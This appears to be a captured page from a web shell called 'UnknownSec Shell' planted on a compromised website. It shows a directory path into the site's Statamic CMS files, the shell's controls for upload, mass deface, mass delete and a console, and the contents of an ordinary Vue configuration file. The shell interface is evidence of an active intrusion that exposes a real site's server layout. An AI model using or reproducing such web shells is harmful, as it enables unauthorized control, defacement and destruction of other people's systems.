shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
js
/
components
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Config.js
import Vue from 'vue'; class Config { constructor(instance) { this.instance = instance; } all() { return this.instance.$store.state.statamic.config; } get(key, fallback) { return data_get(this.all(), key, fallback); } set(key, value) { this.instance.$store.commit('statamic/configValue', {key, value}); } } Object.defineProperties(Vue.prototype, { $config: { get() { return new Config(this); } } });
© 2026 UnknownSec